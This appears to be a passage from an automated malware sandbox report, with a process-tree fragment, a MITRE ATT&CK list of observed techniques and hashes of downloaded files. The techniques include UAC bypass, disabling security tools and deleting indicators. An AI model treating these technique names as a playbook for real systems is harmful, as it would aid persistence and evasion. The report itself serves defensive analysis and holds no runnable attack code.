- Suspicious use of AdjustPrivilegeToken
PID:15244
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13628
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:8876
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 10416 -ip 104161⤵PID:6436
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51f83674197b584a90953802cf2530e81
SHA11918b6b7e83420a86c1852742357506203206b25
SHA2569d6e618463f14e0dcce24ed841045794d669c45b486860a302940c62f6db5f4e
SHA512cd330bbff8d182ebf48a877ff1e2ffd47cd752f035a788f9c26458f8ae0cb62e0f86b1be63efa237c6d5089ddd6fce953a4bcefff8de492444e51384fcfc639e
-
Filesize
12KB
MD53cd4838f4e06518e99c1e981d91c97e2
SHA11dd9e8a2c9ebc7c9a2fef3d64c5c1e214f0e6e03
SHA256a7ada7b19a62e8efa8b0a1ac42a76ad7869a6adfed05b32e000b258582bda5ab
SHA512c5dbcc4307d6a236a1a1c32c2d5361951ff2c267ef6306fa115dac284151c107784874eb10018b2e76a08a15886a220f09fbf8472d668cef17ed4c5689b66382
-
Filesize
684B
MD503870da5b3d39705459aac81101dec01
SHA146df54ae11613dcd5bca96ce0a06db2776475912
SHA256f23c242b92097938f099410e0e79469af7f67b681482b99ee42ed9fd902d87fc
SHA51236b9858fef8599332d5dc59830d338fc1223bf7f4c50517298c7a245bab5b4560443f992ca7ae18b4fb0af092bcd203dae6b21b7a286a98fc512b22ff182d7c0